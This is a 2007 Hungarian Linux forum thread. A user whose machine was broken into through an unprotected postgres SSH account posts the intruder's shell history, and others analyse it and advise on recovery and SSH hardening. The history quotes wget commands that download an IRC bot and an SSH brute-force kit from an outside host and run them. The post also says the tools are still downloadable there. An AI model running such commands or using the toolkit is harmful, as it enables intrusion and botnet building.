Betörtek a gépemre, segitsetek!

UNIX haladó

Tegnap eset postgresql-t telepitettem, majd bekapcsolva hagytam a gepem ejszakara. Hülye voltam mert a postgres felhasználó jelszavát nem modositottam, igy azon sikerült valakinek ssh-n keresztül bejelentkezni!

A bejelentkező postgres felhasználókent a következő utasitásokat adta időrendben:

90 w
91 passwd
92 cat /proc/cpuinfo
93 cd /var/tmp
94 mkdir ." "
95 cd ." "
96 wget http://uzzy.ecv.ms/drone.tar
97 tar -xzvf drone.tar
98 cd drone
99 cd drones
100 ./go
101 cd ..
102 wget http://uzzy.ecv.ms/romhack.tgz
103 tar -xzvf romhack.tgz
104 cd romhack
105 ./a 72.2
106 nohup ./start 81 >>/dev/null &
107 ps x
108 exit

Szerintem ezen eleg jól el lehet indulni! Előre köszi a segitseget.
Termeszetesn a progik meg az adott cimen elerhetőek,,,,ugyhogy aki tudja marja es lesse meg!

  • 14704 megtekintés

( sjrextor | 2007. 11. 06., k – 01:51 )

AZONNAL NET OFFLINE!!!!
utánna nézzed meg a scriptje mit csinált, és tedd a fordítottját, mint amit a script!
ha más nem, gyaluld le a gépet...

( synapse | 2007. 11. 06., k – 01:58 )

rá-basz-tál

- Mit csinal a ket program? Rakd ki oket valahova, hogy lassuk.
- /var/log-bol relevans logbejegyzesek alapjan jelentsd a bunkot.
- Rebootold a gepet, livecd-vel bootolj be. Forgass uj kernelt(biztos ami biztos), rakd a helyere, kovetkezonek ezzel bootolj be.
- Regi kernelt osszes modullal egyutt felejtsd el(torold le), de meg amig a livecd-rol vagy bebootolva.

Meg igy is maradhat backdoor a gepen, de az bios-bol vagy mashonnan fertoz. Ha ilyened van akkor meghivlak egy sorre, ilyenekkel nem dobaloznak botok ;)

synapse

( Ballage | 2007. 11. 06., k – 01:59 )

Ha mákod van, akkor nem sikerült semmi fontosat átírnia. Valószínűleg csak zombinak használta volna a gépedet.

-------------------------------------------------
" - Amerikanische Infanterie! Angriff! Angriff! "

"Jó hát azert az hogy gyaluljam le a gepem nem tul epito megoldas, mar bocsi!"
Az egyetlen biztos megoldás. Honnan tudod, hogy megtalálsz mindent, amit megváltoztatott? Én biztos nem lennék nyugodt, ha nem raknám újra a gépet. Persze előbb ki kell deríteni, hogy hogy jöttek be, hogy az ne fordulhasson mégegyszer elő. De elvileg ezt már tudod, szóval elő azzal az install CD-vel :D

A scriptek és a parancsok alapján, amit bepostoltál a következő történt:

1. felnyomták a géped.
2. lefuttatta az a nevü parancsot, ami szépen annyit csinál,
hogy kiir egy idióta bannert, aztán lefuttatja a pscan2-t,
ami elkezdi végig-scannelni a hálót és gépeket keres nyittot
22-es porttal. Csinál belőlük egy szép listát.
3. Ha a fentiekkel megvan, akkor indítja az sshd-t, ami egy
ssh brute forcer (sshd néven álcázva, hogy ne vedd észre)
ez szépen beolvassa a pass.txt-t és az abban található
felhasználónév+passwd párosokkal elkezdi brute-forceolni a
a talált gépeket.

(Az ss nevü progit még nem tudtam megvizsgálni, de az valami
exploit, v. scanner.)

A lényeg, hogy ez az egész végül is csak egy toolkit. Amennyit
sikerült eddig megvizsgálni (ss kivételével), egyik sem rootkit,
nem virus, stb.
A drone pedig egy IRC bot.

Szóval a géped egy ugródeszka lett volna a további gépek kereséséhez,
na meg persze irc botot is futtatott volna.

Ezek alapján a fent említett programok különösebben nem vészesek,
ugyanakkor a fent leirtak nem jelentik azt, hogy a gépedre ne tehetett
volna rootkit-et is (a többi parancsra utaló logokat törölhette).

A többiekhez hasonlóan én is azt javaslom, hogy töröl minden, rendszer újrahúz.

Üdv,
Morin

A scriptek és a parancsok alapján, amit bepostoltál a következő történt:

1. felnyomták a géped.
2. lefuttatta az a nevü parancsot, ami szépen annyit csinál,
hogy kiir egy idióta bannert, aztán lefuttatja a pscan2-t,
ami elkezdi végig-scannelni a hálót és gépeket keres nyittot
22-es porttal. Csinál belőlük egy szép listát.
3. Ha a fentiekkel megvan, akkor indítja az sshd-t, ami egy
ssh brute forcer (sshd néven álcázva, hogy ne vedd észre)
ez szépen beolvassa a pass.txt-t és az abban található
felhasználónév+passwd párosokkal elkezdi brute-forceolni a
a talált gépeket.

(Az ss nevü progit még nem tudtam megvizsgálni, de az valami
exploit, v. scanner.)

A lényeg, hogy ez az egész végül is csak egy toolkit. Amennyit
sikerült eddig megvizsgálni (ss kivételével), egyik sem rootkit,
nem virus, stb.
A drone pedig egy IRC bot.

Szóval a géped egy ugródeszka lett volna a további gépek kereséséhez,
na meg persze irc botot is futtatott volna.

Ezek alapján a fent említett programok különösebben nem vészesek,
ugyanakkor a fent leirtak nem jelentik azt, hogy a gépedre ne tehetett
volna rootkit-et is (a többi parancsra utaló logokat törölhette).

A géped azért lassult be annyira, mert az sshd szépen agyonforkolta a gépet.

A többiekhez hasonlóan én is azt javaslom, hogy töröl minden, rendszer újrahúz.

Üdv,
Morin

Na annyi változott, hogy tesztelgettem postgreskent mit csinálhatott, de veletlen egy másik terminalon voltam postgreskent es veleten sikerült elinditanom az egyik alkalmazast root-kent!

Na most egy oramba került, hogy a gep elinduljon...az alkalmazások 90%ka elszáll segmentation fault-al, ja es allandoan kapcsolatokat epit ki, feloldhatatlan nevü szerverekkel. Eleg jol hangzik nem?

Termeszetesen legyalulni nem fogom, az NEM MEGOLDAS, azert vagyunk, hogy az ilyen szitukat megoldjuk es megtalaljuk a bünöst.

Elöször is azt kellene kideriteni, hogy progi volt-e aki bejelentkezett az ssh-n vagy egy felhasznalo?

En ugy gondolom, hogy felhasznalo, mert ha megfigyelitek van benne egy eliras!
Az egyik C forras ott van, ha megnezitek, az azert sokat elárulhat...bár távolrol sem biztos, hogy a támadó irta a kodot! A támadó ip-jet eddig nem találtam, ha jol sejtem a secure-ban kellene lennie.

Köszi minden segitseget!

"Termeszetesen legyalulni nem fogom, az NEM MEGOLDAS, azert vagyunk, hogy az ilyen szitukat megoldjuk es megtalaljuk a bünöst."

I don't run exploits as root anymore.
I don't run exploits as root anymore.
I don't run exploits as root anymore.
I don't run exploits as root anymore.
I don't run exploits as root anymore.
I don't run exploits as root anymore.

"veleten sikerült elinditanom az egyik alkalmazast root-kent" ... "az alkalmazások 90%ka elszáll segmentation fault-al, ja es allandoan kapcsolatokat epit ki"

Ez esetben én nem gondolkoznék azon, hogy a nulláról újratelepítsem-e.... Attól kezdve, hogy volt root joga, bárhová belenyúlhatott. Ja, és telepítés alatt nem árt, ha a gép rendes tűzfal mögött van.

-------------------------------------------------
" - Amerikanische Infanterie! Angriff! Angriff! "

( sartek | 2007. 11. 06., k – 04:23 )

a drone.tar ez egy emech
a romhack.tgz az meg amivel nalad is belepett -- ssh bruteforce

szal
ha mast nem csinalt akkor nincs nagy gond mert ezeknek csak egy shell kell ahova tudja tenni a botjait,,, jelszo csere stb es kesz

a pscan az meg portscanner azert szalnak el a dolgaid mert az tulterheli (elbasz valamit) a rendszert (azert nezett cpuinfo-t)

Én meg azt mondom, hogy néhány rootkit ellenőrzőt futtass végig.
Egyszer réges-régen megtörtént velem, hogy egy gépen fenn volt egy apache, amit nem futtattam. Így nem is frissítettem, meg persze el is felejtettem. Egyik nap a takarítónéni kisöpörte a tápkábelt, majd visszadugta, elindította a gépet, az apache elindult. Akkoriban terjengett a neten pont egy olyab robot, ami az apache egyik hibája miatt root jogot tudott szerezni. 3 órámba került, mire mindent rendbetettem:
Jó kiindulási alap lehet a live CD-t lévő "login" parancs méretösszehasonlítása, stb. Nem emlékszem, mi volt annak a rootkitnek a neve, de elég rafkós volt. A háttérben futtatta magát egy megtévesztő szolgáltatásként, és amint letöröltem valamit a "cuccai" közül, azonnal előkapta az elrejtett csomagjából az idevágó forrást, és újraépítette. Vagyis ezzel azt akarom mondani, hogy előszür azzal kezd, hogy fut-e olyan deamon, ami legfeljebb csak hasonlít valamire, vagy nem is tudod, mit keres ott, és nézdd meg a crontab-ot is.

Szerk.:
Megnéztem a forrásokat: ssh-n ne lépj be, mert az ő sshd-ja fut!

Ha jól értem akkor azt mondod, ohgy a romhack az egy egyszerü bruteforce-s hacker progi, a drone pedig egy IRC-bot, amelyik elinditva kapcsolodik a a Diemen.NL.EU.Undernet.org,Helsinki.FI.EU.Undernet.org szerverek #Romhack es #Cannel szobáiba és ott * By #RoHack * ként figyel! "Az infok a raw.session fájlbol jöttek, nem a hasamra ütötte+

Szerintem ez igy tul szép és egyszerü lenne és nem hinném, hogy ezért nem indulna ujra a gépem(egész pontosan az eszközfájlok generálásánal hal be a dolog) ami ugye az .

1)A másik része pedig egy olyan progi kellene(reménykedem, hogy létezik ilyen), ami egy virtuális gépet generál és figyeli az elinditott program tevékenysegét(főleg ilyemire gondolok, hogy hova akar irni), mert ha ugye van ilyen akkor nincs gond, ugyanis lépésről lépésre végignézem, hova ir a progi és egyértelmüen kiderül hogy mi a gond. HA nincs ilyen progi, akkor valaki legyen szives irjon egyetg :-)

2)A másik dolog, ami jó lenne, ha tudnák egy modositás időpontja szerinti fájlistát késziteni(nem tudom van-e erre lehetőség, de ha igen irja már meg valaki) , mivel nem másolt fájlokról van szó nagyrészt, azért valoszinü, hogy ő nyult bele, amit elvileg az utolsó modositás idöpontjából látnom kellene,,,bármelyik megoldásnak örülnék a kettő közül!

> A másik dolog, ami jó lenne, ha tudnák egy modositás időpontja szerinti fájlistát késziteni(nem tudom van-e erre lehetőség, de ha igen irja már meg valaki)

Ez most komoly?

find és ls man-ját megnézted már?

Find-dal tudsz keresni pl. módosítási időre, tehát megnézheted, melyik fájlok módosultak az elmúlt 3 napban, vagy mondjuk pontosan tegnapelőtt.
ls-sel tudsz módosítás szerint sorbarendezve listázni, de szerintem neked nem ez kell, hanem a find.

Egyébként gyorsabb, és biztonságosabb lenne újratelepíteni, mint megpróbálni a végére járni, hogy mi romolhatott el, és egész hátralévő életedet azzal a mardosó bizonytalansággal élni, hogy lehet, hogy valamit nem vettél észre....

G

Nem beszélve arról, hogy már a DOS-os vírusok, amik igen kezdetlegesek voltak, már azok is tudták, hogy miután megfertőztek egy file-t, visszaírták az eredeti dátumot. (persze akkor még csak egy dátum volt, de meddig tart pl az ls/touch-al elmenteni és visszaállítani bármelyik filedátumot? /célprogramról (c,asm...) nem is beszélve/)

Akkor aztán lehet keresni a módosított dátumú fileokat.

(+ megteheti, hogy random módosít mindenféle futtatható file dátumot, amihez hozzá sem nyúl, csak hogy a júzer ne unatkozzon és a szűz fileokat bogarássza:) )

"Nem beszélve arról, hogy már a DOS-os vírusok, amik igen kezdetlegesek voltak"

helyzet az, hogy a régi dos-os időszak óta nem nagyon láttam normális vírust (persze volt egy pár win alatt), csak visual basicben script kiddiek által írt "worm"-okat...
Azokban az időkben láttam olyan vírust is, ami tudott fertőzni exe, com fileokat és master boot recordot is...

( emberk | 2007. 11. 06., k – 08:36 )

Én csak kérdeznék. Hogy honnan lehet kideritení ha feltörték a gépemet? Soha nem csináltam szervert, egy mezei desktop van fent nekem nem is telepítettem semmilyen szervert, tudtommal, hacsak nem hozott magával valamelyik függőség valamit. Nem ellenőriztem mind a xxxx-db csomagot. Viszont szeretnék csinálni egy szervert dynaliassal, mert egy csomó embernek én pakolgatom a tök legális hanganyagát -engedéllyel felvett előadások mp3ban-, de az összes ingynes szolgáltató gyak 1-2 nap alatt törli, mert mp3 a tartalommal nem foglalkoznak (meg is nézném azt a rendszert ami tud ná ezt). Ehez hogy egy kis meze ftp-t összerakjak tud valaki valami korrekt doksit. Guglizni is lkehet találtam is jópárat, de hátha nem szurtam ki valamit.

Szokatatlan log bejegyzések.

Gyanús tevékenység. pl-> ismeretlen process. Ismert processzek nem megszokott tevékenysége pl. net kapcsolat (elég furcsa, ha pl. egy apache szerver mondjuk kapcsolatot kezdeményez kifele..)

kernel image, modulok, programok, libek , megváltozása a te explicite kívánságod nélkül. (checksumokat le tarolhatod es hasonlithatod, némely csomag kezelő ezt megteszi (rpm,emerge (tároltatja)))
LD_PREALOAD környezeti változó indokolatlan létezése ..stb.

rootkit keresők keresnek hasonló tevékenységeket. De némelyik rootkit elvileg képes becsapni őket, ezert CD -ről bootlás nem árt kereséshez.

Soha egyetlen felhasználónak se lehessen trivialis jelszava, 0. alapszabály.
probálgatáskor ne hozz létre test nevű felhasználót test jeszóval vagy ilyesmi, az gyakran egyelő egy öngyilkossággal.

"Hogy honnan lehet kideritení ha feltörték a gépemet?"
Hát, vannak erre mindenféle programok, de én a magam részéről a saját szkriptemre esküszöm, mint minden olyan feladatnál, amit saját eszközzel is meg tudok oldani.
Én egy floppyról boot-olva "validálom" időnként a gépem: megfuttatok egy find-et, és az összes futtatható progira letárolom az md5 checksum-ot, és a fájlméretet. Egy diff pedig megmutatja a különbségeket az előző állapothoz képest. Elvileg minden programtelepítés/frissítés után meg kellene ezt csinálni, de ehhez már nem mindig van elszántságom...
---
Mondjon le!

( saxus | 2007. 11. 06., k – 09:17 )

Ha fontos gép, ne kockáztass: gyalu, aztán pakold vissza backupból. Ha nincs teljes backup, akkor szopi, marad a full reinstall.

( _Petya_ v | 2007. 11. 06., k – 09:41 )

Az ilyen ssh brute force támadások ellen meg tegyél fel denyhosts-ot.

Petya

( sj | 2007. 11. 06., k – 10:00 )

A reflexbol torteno reinstall semmit nem er. Ti. ha ugyanazt es ugyanugy teszed fel, akkor miben lesz mas az uj rendszer? Semmiben, ezert ha a regire bejottek, az ujra is be fognak jonni.

Par alap dolog:

- ssh-val csak kulccsal jovunk be, es csak ismert cimekrol. root nem jon be ssh-val.
- security patch-ek naprakeszen fenn vannak
- suid/sgid programok letisztitva (amire nem kell, arrol levesszuk a s*id jogot)
- folosleges demonok leallitasa
- valami hardened kernel (grsecurity, openwall, selinux, ... akarmi)
- egy minimalis tuzfal szabaly (es igy magas porton sem erik el a backdoor-t)

A 'hogyan tudom, hogy feltortek a gepet?' kerdesre pedig a host intrusion detection (IDS) programok (pl. tripwire, aide, ...) adnak valaszt. Ezeket azonban rogton system install utan kell telepiteni, es napi (min. 1x) futtatni az ellenorzest. (ja, es vannak network IDS programok is).

ASK Me No Questions, I'll Tell You No Lies

( maestro | 2007. 11. 06., k – 10:57 )

Ismerős az eset.

dron.tgz kitomorited megnézed milyen server illetve owner nicket konfigurált, felmesz ircre megnézed milyen csatin találod az ownert, rogzited az ip cimet. Öszzehasonlítod az ipvel amivel connectelt a gépedhez, ha egyezik akkor szerencséd van. Megírod az abuse mailt a szolgáltatójának. Ha nem egyezik az ip akkor vagy proxyt használt vagy bnc-t.
Kb fél óra alatt tucc már aktivan csettelni a nagy "haxorral".

Sok sikert!

( pezia | 2007. 11. 06., k – 13:19 )

Ez amugy milyen disztribbel tortent? Csak mert nekem postgres userrel alapbol nem lehet beloginolni (Debian).

Slackware 12.0, egyébként baszott jó disztró, ugyhogy kérem senki ne szidja, ez evidens az én balfaszságom volt(bár kurva fáradt voltam a mentségemre legyen mondva).

A postgres esetében pedig kötelezővé tenném, hogy első inditáskor a felhasználónak kelljen megadni a postgres felhasználó jelszavát...az viszont szerintem nagyon fontos biztonsági lépés lenne!

szerintem a disztró lényegtelen.
túl sok a "véletlen". pl: véletlenül nem lett adva jelszó a postgres usernek, így véletlenül be tudott lépni ssh-n, véletlenül másik terminálon véletlenül root-ként lett futtatva az ismeretlen script...
első körben ki kellene zárni a véletleneket és tanulni a hibákból. pl sshd-t bekonfigurálni egy minimálisan elfogadható szintre. értem ezalatt: nincs jelszavas belépés, csak és kizárólag kulcsos, nincs root login ssh-n, nincs üres jelszavas belépés (bár ezt az első pont kizárja.), az ssh port megváltoztatása.
ezekután meg kellene változtatni _minden_ eddigi jelszót a gépen (included összes user, sql, ftp, stb).
a fentebb említett livecd-s módszerrel eltávolítani minden idegen anyagot a gépről.
átnézni a tűzfalszabályokat, beállítani egy alapból mindent tiltó üzemmódot és csak azt engedélyezni, ami valóban szükséges.
ezekután lehet ircelni, meg megtorolni (ami tök értelmetlen, inkább tanulni kellene belőle), stb.
::sumo.conf::

Most erre mit vársz? Igen igazad van, hülye voltam. Nyilván ez a helyzet.
De most van egy helyzet, és ugye most megint eljutottunk oda, hogy mindenki leirja, hogy miben hibáztam, de előrébb én ettől most perpill nem vagyok. Tehát ott van fent a progi, valaki aki annyira képbe van, fusson már át rajta. Az egyiknek a forrása is megvan, csak én programoztam még hálózati alkalmazást C-ben igy nem igazán látom át.

Az ssh-ból pedig a root-ot nem igazán szeretném kizárni, mivel már nagyon sokszor jól jött ez a feature...ssh-rootként.

A fentebb emlitett live-cd-s megoldás...melyikre is gondolsz?

"A fentebb emlitett live-cd-s megoldás...melyikre is gondolsz?"
egyszerűen indíts el egy live cd-t, csatold fel a partíciókat és a nem odaillő dolgokat távolítsd el onnan.

"most megint eljutottunk oda, hogy mindenki leirja, hogy miben hibáztam, de előrébb én ettől most perpill nem vagyok"
miért nem? ha ezeket megcsinálod, akkor sikeresen elzárhatod a gépedet a további ismeretlen kommunikáció elől. véleményem szerint ez a cél, nem pedig az, hogy első körben megértsd az ismeretlen által futtatott programok működési elvét.

"Az ssh-ból pedig a root-ot nem igazán szeretném kizárni, mivel már nagyon sokszor jól jött ez a feature...ssh-rootként."
ez botorság. ha van egy usered, akinek van adminisztrációs jogosultsága, akkor az bőven elég. hiszen csak belépsz vele (persze kulcsos azonosítással), majd "sudo su", vagy "su", vagy amit használsz ahhoz, hogy az userddel rootkodhass.
::sumo.conf::

okés csak hirtelen nem látom át, hogy ez a megoldás(sudo su) miért biztonságosabb mondjuk egy kulcsos bejelentkezésnél.

Nem a program müködését szeretném megérteni, hanem egy fájlistát szeretnék kapni, amibe a program irni probál. Ez szerintem nem egy olyan nagy elvárás, vagy igen?

Azért biztonságosabb, mert ha be lehet lépni ssh-val root-ként, akkor amint megfejtett egyetlen jelszót, övé a gép. Gyakorlatilag felderíthetetlen, hogy mi mindent írt át.
Ha ki akarod deríteni, akkor nincs más megoldás, mint sorról sorra végignézni a kódjait, ez iszonytató meló és még ekkor sem lehetsz biztos benne, hogy nem volt még több programja is, amik az egész rendszeredet összevissza írták, csak azokat már leszedte, és eltűntette a nyomokat.

Ha meg ssh van más userként, aztán su root-ra, akkor egy jelszó megfejtése után még van időd elkapni, mialatt a második jelszót próbálgatja. Ha a géped minden loginért szól neked, akkor ez nem esélytelen.

(A különbség kb. olyan, mint hogy a bezárt lakásban is be kell zárni a vadászpuskát a fegyverszekrénybe.)

Én csak kulcsos bejelentkezést engedek. root-ként is be lehet lépni.

Ha a kulcsos bejelentkezéssel be tud lépni, akkor mindegy, mert ezek szerint ellopta a gépemről a privát kulcsomat, és kifigyelte a jelszavamat.
Mivel a kulcs engem azonosít, ezért root-ként ugyanazzal a kulccsal lépek be, mint saját userrel.
De persze ha az egyiket el tudta lopni, akkor ha több kulcs lenne, akkor a mellette levő másikat is el tudta volna lopni.

Én ezt nem érzem kockázatnak. Találgatással ugyanúgy nem tudj bejutni root-ként se, mint sima userként.

G

Mivel a kulcs engem azonosít, ezért root-ként ugyanazzal a kulccsal lépek be, mint saját userrel.
De persze ha az egyiket el tudta lopni, akkor ha több kulcs lenne, akkor a mellette levő másikat is el tudta volna lopni.

Pl. nem tartod magadnal root kulcsat, vagy egyaltalan nem engeded root-kent a bejelentkezest, mert teljesen felesleges dolog, mivel letezik su.

---
pontscho / fresh!mindworkz

Az addig O.K. hogy letezik es mukodik a su, de nekem mar volt olyan esetem amikor egy megrogyott exim fullra megtoltotte a var-t a logokkal. Megtelt a particio. Csak root tudott loginolni, hala a fenntartott teruletnek. Sajnos eppen az orszag masik felen voltam... ha nem lett volna root ssh bizony nagyon sok kilometerbe kerult volna.

Udv:
Feri

( szabolcs1975 | 2007. 11. 06., k – 13:22 )

Tehát két dologban kérném a segitségeteket:

1)Egy olyan progi kellene(reménykedem, hogy létezik ilyen), ami egy virtuális gépet generál és figyeli az elinditott program tevékenysegét(főleg ilyemire gondolok, hogy hova akar irni az adott progi), mert ha ugye van ilyen akkor nincs gond, ugyanis lépésről lépésre végignézem, hova ir a progi és egyértelmüen kiderül hogy mi a gond. HA nincs ilyen progi, akkor valaki legyen szives irjon egyetg :-)

2)A másik dolog, ami jó lenne, ha tudnék egy modositás időpontja szerinti fájlistát késziteni(nem tudom van-e erre lehetőség, de ha igen irja már meg valaki) , mivel nem másolt fájlokról van szó nagyrészt, azért valoszinü, hogy ő nyult bele, amit elvileg az utolsó modositás idöpontjából látnom kellene,,,bármelyik megoldásnak örülnék a kettő közül!

Szerintem huzdd ujra inkabb az egesz gepet, ha eleg ugyes valaki datumbol se fogod latni, hogy eppen huzza nyult-e. Mindenesetre, ha arra vagy kivancsi, hogy egy program milyen fileokat hasznal arra ott van az lsof. Filelista modositas datuma helyett szvsz inkabb valamilyen checksumot kene ellenorizgetni, de van csomo program ami segitsegedre lehet ilyen betoreses dolgok felderitesere, es elkelusere. AIDE, Tripwire, bar inkabb erdemes megelozni a dolgokat, es inkabb egy virtualis gepben probalkozni uj dolgok kiprobalasaval :), aztan meg tuzfalat is erdemes felhuzni.

( szabolcs1975 | 2007. 11. 06., k – 14:07 )

A virtuális gépre nincs megoldás?

Az a gond, hogy az egész fájlrendszerről állandóan cheksumot késziteni, azért elég durva. Tényleg nincs egy olyan progi, ami egy tesztkörnyezetet biztosit és figyeli a kód tevékenységét? Pedig ez tényleg jó lenne!

legalább olyan szinten, hogy látnám milyen állományokhoz probál meg hozáférni

Semmit nem érne, ha virtuális gépben futtatod. Közben az irc-n keresztül vezérelhették a programot, nem biztos, hogy mindig ugyanazt csinálja. (Még annyira trükkös is lehet egy cracker, hogy futtat egy ilyen irc-n figyelő izét, és az ebben lévő (tudatosan beleírt) buffer overflow-t kihasználja egy távoli kódfuttatásra, és azzal írja bele a következő kódját a rendszereden a libc-től és a kerneltől kezdve még a browserbe is. Nem tudom, hogy van-e ilyen, de elvileg simán meg lehetne csinálni.)

Szerintem alapvetően két megoldás van:
a) újratelepíted az egészet, csak adatokat (programot egyet sem) viszel át az az új rendszerre
b) egy másik ugyanolyan gépre feltelepíted ugyanannak a disztribúciónak ugyanazt a verzióját, ugyanazokkal a beállításokkal, és minden (futtatható) file-nak összehasonlítod az md5 ellenőrzőösszegét a két gépen.

Mindkét esetben, mielőtt visszateszed a gépet a netre, be kell jól konfigurálni a cuccokat.

(Mondjuk az a) esetben én még azért kétszer is meggondolnám, mielőtt egy, az adott gépen futó browserbe beírnám a bankkártyaszámomat.)

( xilu | 2007. 11. 06., k – 14:55 )

asszempályamódosításba kezdek...
fősulin minnndenről zagyválnak csak a fontos dolgokról nem...
vagy ez nem is fősulin kéne tanulni?

munkahely, google talán?

--
Xiluka

( csonti | 2007. 11. 06., k – 14:56 )

Olvasgatom a postokat és az ssh biztonsági alapokkal kapcsolatban nem értek mindent.
Írjátok, hogy belépés csakis kulccsal és meghatározott IP-ről és rootként tilos.
De akkor mi van, ha nem otthonról kell elérni a konzolt? Cipeled magaddal mindenhova a kulcsot? Ekkor ugye az IP alapból kiesik.
Mit csinálsz, ha nyaralás közben, az Adria partján vagy és kidől a levelezésed?
Belépés csak nem root-ként. Szóval valami felhasználóval bemegyek konzolon és su paranccsal váltok. Ekkor egy jó chroot kell, ugye. Van olyan chroot, amit egy nyolc általánost végzett hacker nem tud feltörni? Másrészt így a felhasználóknak lesz shell-jük? Talán nem lehet néhány ócska trükkel root jogokhoz jutni mezei felhasználóként? Vagy csak egynek adjak shell-t? Annak a jelszavát/kulcsát nem lehet ellopni?
Esetleg pont fordítva: shell belépés csakis rootként, nagyon erős, gyakran változó jelszóval. :) Na?

Mondjuk annyi talán, hogy a sudo-s megoldással nem teszed ki semmilyen formában a jelszavad a hálóra, az SSH ha jól tudom akkor a publikus kulcsal titkositott formát kiteszi amit elvileg csak a privát kulcsal rendelkező szerver tud kikódolni...vagy nem? Viszont tudtommal ennek a feltörésnek a számitási igénye jópár év....

A visszafejtési idő nagyon függ a kulcs hosszától. De a kódolt jelszó az su-s (sudo-s) megoldás esetén is átmegy, amikor a su-hoz írod be a jelszót, csak kódolt adatforgalomként.
Ha (nagyjából) biztosra akarsz menni, akkor a usernek hosszú kulcsot generálsz, a szerver nyilvános kulcsát és a saját titkos kulcsodat pedig pendrive-on magaddal viszed. Ha be akarsz jelentkezni, akkor először ellenőrzöd, hogy a szerver az-e, akinek mondja magát (man in the middle attack kizárása, a szerver kulcsa ahhoz kell, hogy ellenőrizd, hogy nincs-e félúton valaki, aki elkapja, amikor bejelentkezel, és aztán bent van a nevedben; erre szolgál a .ssh/known_hosts file), majd a saját kulcsoddal authentikálsz (ez már megy úgy, hogy a kulcsod nem megy át a hálón, még kódoltan sem, hiszen elég azt ellenőrizni, hogy a szerver elkódol valamit a nyilvános kulcsoddal, és te vissza tudod-e küldeni a szerver nyilvános kulcsával kódoltan, azaz, ha meg tudod mondani, mi volt egy kódolt üzenetben, akkor már biztos, hogy rendelkezel a titkos kulcsoddal).
Természetesen, ha valaki talál egy gyors (polinomiális idejű) prímfaktorizációs eljárást, akkor ennek lőttek, de ezen én egyelőre nem nagyon aggódnék.

Nem, akkor a szerver nem tudná megfejteni. A küldött adatot a szerver nyílt kulcsával titkosítod, amit a szerver tud megfejteni az ő titkos kulcsával. A szerver pedig a te nyílt kulcsoddal titkosít, amit te tudsz megfejteni a te titkos kulcsodal.
Ez persze csak az elején van így, authentikáció + szimmetrikus kulcsú kódoláshoz kulcscsere, mert különben döglassú lenne.

Írjátok, hogy belépés csakis kulccsal és meghatározott IP-ről és rootként tilos.

Azért nem kell mindent készpénznek venni, amit a HUPon írnak (így ezt sem :) Szerintem egy erős jelszó vagy passphrase teljesen megfelelő biztonság. Mindig abból kell kiindulni, hogy kinek éri meg feltörni a gépedet. Ha egy bank biztonsági rendszeréért vagy felelős, akkor lehetsz paranoid. Ha otthoni a géped, akkor kb szkript kidiktől vagy botoktól kell tartanod. Nekem 22-es porton megy az ssh erős jelszóval, akárhonnan be lehet lépni. Amíg nincs nagyon komoly remote exploit ssh-ban, addig nem értem, mitől kéne tartanom.

Amíg nincs nagyon komoly remote exploit ssh-ban, addig nem értem, mitől kéne tartanom.

1. Ha nagyon komoly is a jelszavad, de a probalgatas ellen nem vagy vedve. 1 gepnek sokaig tarthat a melo, de vajon egy szuperszamitogepnek (=bot halozatnak) is?

2. Mert amikor napvilagra kerul az a 'nagyon komoly' sec. bug, akkor mar benn is vannak a gepeden (legalabbis safe to assume).

3. Ma mar a (hagyomanyos) jelszavak nem adnak megfelelo biztonsagot, ahhoz min. 2 komponens kell: valamit tudsz (jelszo) + valamid van (kulcs) (+ esetleg valaki vagy: valami biometrikus cucc, irisz, ujjlenyomat, ...)

ASK Me No Questions, I'll Tell You No Lies

Epp errol szolt a hozzaszolasom: ugyan kinek allna erdekeben egy botnetet raallitani a gepemre? Semmi ertekes info nincs rajta. Akkor minek is vacakoljak tuzfallal meg kulcsos belepessel? Ha korlatozom az IPket, akkor nem tudok akarhonnan belepni, ha csak kulccsal lehet belepni, akkor azt valami adathordozon magamnak kell tartani. Azt meg ugye ellophatjak. Ha biometrikusan kodolom, es nagyon kell nekik valami, akkor levagjak az ujjam :) Akkor mar inkabb a jelszavamat fejtsek meg...

Az a legbiztonsagosabb, ha olyan modszerrel veded a gepedet, amit többe kerül feltörni, mint a gépeden tárolt informació értéke :)

Epp errol szolt a hozzaszolasom: ugyan kinek allna erdekeben egy botnetet raallitani a gepemre?

Tetszoleges script kiddinek, lasd fenti pelda.

Ha biometrikusan kodolom, es nagyon kell nekik valami, akkor levagjak az ujjam :)

Nem vagjak le, mert azt ma mar konnyu eszre venni, hogy elo ujj, vagy valamilyen potlek van az erzekelo elott. Leutnek es visznek. Az ebredesed nem garantalt. :)

Az a legbiztonsagosabb, ha olyan modszerrel veded a gepedet, amit többe kerül feltörni, mint a gépeden tárolt informació értéke

Ma mar a legkevesebb esetben torik a geped a rajt levo informacioert. Lasd fenti pelda.

---
pontscho / fresh!mindworkz

Elsősorban nem a gépeden lévő infóérttörik, hanem hogy hozzátegyenek még egy gépet a botnetükhöz. Azért egy párezer CPU-s klaszter beszerzésének ez még mindig egy igen olcsó módja.

(Aztán a botnetet már nem csak egyedi gépek jelszótörésére lehet felhasználni, hanem DDOS attackokra, banki jelszavak fejtésére, stb.)

Elsősorban nem a gépeden lévő infóérttörik, hanem hogy hozzátegyenek még egy gépet a botnetükhöz.

Igaz, de erre nem fogják a meglevő botnetüket használni, ha közben szpemelhetnek meg akármizhetnek vele. Legalábbis addig nem, amíg van elég lámer gép a neten egyszerű jelszavakkal, meg default Win telepítéssel. Ha eljön az az idő, hogy nekiállnak brute force-szal törögetni, akkor lehet, hogy én is komolyabban veszem majd. Egyelőre csak a user:user, root:root john:1234 és hasonló felhasználónév-jelszó párosokat próbálgatják napi 1000-szer. A topicindító gépét is így sikerült megtörni.

szerk: Vagy úgy is lehet nézni a dolgot, hogy ha te lennél a félelmetes hekker, akkor mit csinálnál inkább a botneteddel?

  1. Ráállnál egy darab gépre, ami akár erős jelszót is használhat, és évekig (na jó, legyünk nagyvonalúak: hónapokig) tartó próbálgatással megfejted a jelszavát, amit a gazdája valszeg hamar észrevesz, és legyalulja a gépét, felrak 900 biztonsági csomagot, és soha többet nem tudod feltörni.
  2. Szkenneled a netet nyitott 22-es portokat keresve, és próbálkozol a jelszólistádban szereplő nevekkel/jelszavakkal, és feltörsz napi tizen-x gépet, amely gépek gazdájának -- a jelek szerint -- fogalma sincs a biztonságról.

A kérdés természetesen költői.

Az elsőre: 


#!/bin/sh

/usr/sbin/iptables -I INPUT -p tcp --dport 22 -m state --state NEW -m recent  --set
/usr/sbin/iptables -I INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 120 --hitcount 3 -j REJECT

echo "Az SSH mostantól 2 perc alatt csak 3 kapcsolatot engedélyez!";

